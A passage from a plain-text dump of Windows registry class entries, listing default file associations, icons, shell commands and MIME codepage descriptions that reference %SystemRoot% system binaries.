%SystemRoot%\System32\intl.cpl,,/p:"keyboard" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Cabinet FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\msdt.exe,-10012 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Cabinet\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\msdt.exe,-10013 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Cabinet\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\msdt.exe /cab "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Config FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\msdt.exe,-10014 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Config\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\msdt.exe,-10015 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Config\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\msdt.exe /path "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Document FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\msdt.exe,-10010 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Document\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\msdt.exe,-10011 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Document\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\msdt.exe /path "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Perfmon.Config FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\wdc.dll,-10037 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Perfmon.Config\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\wdc.dll,-10038 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Perfmon.Config\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\perfmon /sys /load "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Perfmon.Document FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\wdc.dll,-10023 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Perfmon.Document\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\wdc.dll,-10024 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Perfmon.Document\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\perfmon /sys /open "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Resmon.Config FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\wdc.dll,-10039 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Resmon.Config\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\wdc.dll,-10040 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Resmon.Config\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\perfmon /res /load "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\windows.storage.dll,-10152 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll,3 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DLNA-PLAYSINGLE FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\dlnashext.dll,-250 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DLNA-PLAYSINGLE\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\dlnashext.dll,-200 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll,8 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\change-passphrase (Default) REG_EXPAND_SZ @%SystemRoot%\System32\fvewiz.dll,-971 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\change-passphrase\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\bdechangepin.exe -pw %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\change-pin (Default) REG_EXPAND_SZ @%SystemRoot%\System32\fvewiz.dll,-970 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\change-pin\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\bdechangepin.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\encrypt-bde (Default) REG_EXPAND_SZ @%SystemRoot%\System32\fvewiz.dll,-920 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\encrypt-bde\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\BitLockerWizard.exe %1 T HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\encrypt-bde-elev (Default) REG_EXPAND_SZ @%SystemRoot%\System32\fvewiz.dll,-920 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\encrypt-bde-elev\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\BitLockerWizardElev.exe %1 T HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\manage-bde (Default) REG_EXPAND_SZ @%SystemRoot%\System32\fvewiz.dll,-949 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\manage-bde\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\control.exe /name Microsoft.BitLockerDriveEncryption /page ?InitialVolume==%1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\resume-bde (Default) REG_EXPAND_SZ @%SystemRoot%\System32\fvewiz.dll,-921 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\resume-bde\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\BitLockerWizard.exe %1 V HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\resume-bde-elev (Default) REG_EXPAND_SZ @%SystemRoot%\System32\fvewiz.dll,-921 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\resume-bde-elev\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\BitLockerWizardElev.exe %1 V HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\unlock-bde (Default) REG_EXPAND_SZ @%SystemRoot%\System32\bdeunlock.exe,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\unlock-bde\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\bdeunlock.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\emffile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe,-3 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\emffile\shell\open\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\emffile\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\emffile\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\evtfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\miguiresource.dll,-106 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\evtfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\miguiresource.dll,0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\evtfile\Shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\eventvwr.exe /l:"%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\evtxfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\miguiresource.dll,-105 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\evtxfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\miguiresource.dll,0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\evtxfile\Shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\eventvwr.exe /l:"%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\shell32.dll,-10156 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Explorer.AssocActionId.BurnSelection FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\explorer.exe,-6023 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Explorer.AssocActionId.BurnSelection\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Explorer.AssocActionId.EraseDisc FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\explorer.exe,-6025 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Explorer.AssocActionId.EraseDisc\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Explorer.AssocActionId.ZipSelection FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\explorer.exe,-6022 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Explorer.AssocActionId.ZipSelection\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Explorer.AssocProtocol.search-ms FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\explorer.exe,-6010 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Explorer.AssocProtocol.search-ms\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Explorer.BurnSelection FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\explorer.exe,-6023 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Explorer.EraseDisc FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\explorer.exe,-6025 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Explorer.ZipSelection FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\explorer.exe,-6022 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll,3 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellNew IconPath REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll,3 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\fonfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontext.dll,-419 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\fonfile\shell\preview\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\fonfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\giffile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\shell32.dll,-30595 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\giffile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-71 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\giffile\shell\printto\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\shimgvw.dll",ImageView_PrintTo /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\gmmpfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\colorui.dll,-14 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\gmmpfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\colorui.dll,-18 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\gmmpfile\shell\Install Profile MUIVerb REG_EXPAND_SZ @%systemroot%\system32\mscms.dll,-170 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll,23 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\winhlp32.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\htmlfile\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\htmlfile\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\icmfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\colorui.dll,-11 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\colorui.dll,-15 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\icmfile\shell\Install Profile MUIVerb REG_EXPAND_SZ @%systemroot%\system32\mscms.dll,-170 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\icofile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\shell32.dll,-30601 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IconLibraryFile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\shell32.dll,-30600 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\setupapi.dll,-2000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-69 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\Install MUIVerb REG_EXPAND_SZ @%SystemRoot%\System32\setupapi.dll,-2002 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\Install\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\InfDefaultInstall.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-69 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JobObject FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\schedsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\jpegfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\shell32.dll,-30596 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-72 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\jpegfile\shell\printto\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\shimgvw.dll",ImageView_PrintTo /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSEFile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\wshext.dll,-4805 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSFile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\wshext.dll,-4804 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Label\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll,-253 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Launcher.Computer\Shell\Manage\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\CompMgmtLauncher.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\LayoutFolder\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\LibraryFolder\DefaultIcon (Default) REG_SZ %SystemRoot%\System32\imageres.dll,-8 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\LpkSetup.1 FriendlyTypeName REG_EXPAND_SZ @%systemroot%\system32\lpksetup.exe,-183 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\LpkSetup.1\DefaultIcon (Default) REG_EXPAND_SZ %systemroot%\system32\lpksetup.exe,0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\LpkSetup.1\Shell\install MuiVerb REG_EXPAND_SZ @%systemroot%\system32\lpksetup.exe,-184 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\LpkSetup.1\Shell\install\command (Default) REG_EXPAND_SZ %systemroot%\system32\lpksetup.exe /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MAPI/Attachment FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-116 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MAPI/Folder FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-109 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MAPI/IPM.Activity FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-120 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MAPI/IPM.Appointment FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-113 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MAPI/IPM.Contact FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-115 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MAPI/IPM.DistList FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-115 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MAPI/IPM.Message FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-108 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MAPI/IPM.Note FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-108 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MAPI/IPM.Note.Read FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-108 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MAPI/IPM.Post FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-108 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MAPI/IPM.Post.Rss FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-139 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MAPI/IPM.Schedule.Meeting FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-113 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MAPI/IPM.StickyNote FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-117 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MAPI/IPM.Task FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mssvp.dll,-114 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellCmdletDefinitionXML.1 FriendlyTypeName REG_EXPAND_SZ @"%systemroot%\system32\windowspowershell\v1.0\powershell.exe",-120 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellConsole.1 FriendlyTypeName REG_EXPAND_SZ @"%systemroot%\system32\windowspowershell\v1.0\powershell.exe",-107 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellConsole.1\Shell\0 MUIVerb REG_EXPAND_SZ @"%systemroot%\system32\windowspowershell\v1.0\powershell.exe",-112 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellData.1 FriendlyTypeName REG_EXPAND_SZ @"%systemroot%\system32\windowspowershell\v1.0\powershell.exe",-104 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellModule.1 FriendlyTypeName REG_EXPAND_SZ @"%systemroot%\system32\windowspowershell\v1.0\powershell.exe",-106 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellScript.1 FriendlyTypeName REG_EXPAND_SZ @"%systemroot%\system32\windowspowershell\v1.0\powershell.exe",-103 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellScript.1\Shell\0 MUIVerb REG_EXPAND_SZ @"%systemroot%\system32\windowspowershell\v1.0\powershell.exe ",-108 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellSessionConfiguration.1 FriendlyTypeName REG_EXPAND_SZ @"%systemroot%\system32\windowspowershell\v1.0\powershell.exe",-121 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellXMLData.1 FriendlyTypeName REG_EXPAND_SZ @"%systemroot%\system32\windowspowershell\v1.0\powershell.exe",-105 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.ProvTool.Provisioning.1\Shell\open\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\provtool.exe" "%1" /source ShellOpen HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.System.Update.1 FriendlyTypeName REG_EXPAND_SZ @"%systemroot%\system32\wusa.exe",-102 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.System.Update.1\DefaultIcon (Default) REG_EXPAND_SZ "%systemroot%\system32\wusa.exe",-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.System.Update.1\shell\open\command (Default) REG_EXPAND_SZ "%systemroot%\system32\wusa.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\1200 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4608 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\1201 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4609 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\1250 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4610 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\1251 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4611 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\1252 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4612 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\1253 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4613 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\1254 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4614 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\1255 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4615 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\1256 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4616 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\1257 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4617 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\1258 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4618 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\20866 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4623 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\21866 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4624 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\28592 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4625 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\28593 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4626 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\28594 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4627 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\28595 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4628 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\28596 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4629 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\28597 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4630 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\28598 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4631 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\38598 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4651 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\50000 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4632 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\50001 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4652 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\50220 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4633 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\50221 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4634 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\50222 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4635 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\50225 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4636 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\50932 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4637 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\50949 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4638 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\51932 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4639 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\51949 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4640 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\52936 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4641 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\65000 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4642 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\65001 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4643 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\708 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4653 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\720 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4654 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\852 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4644 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\862 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4655 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\866 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4645 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\874 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4646 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\932 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4647 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\936 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4648 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\949 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4649 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Codepage\950 Description REG_SZ @%SystemRoot%\system32\mlang.dll,-4650 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Rfc1766 0001 REG_SZ ar;@%SystemRoot%\system32\mlang.dll,-4354 0004 REG_SZ 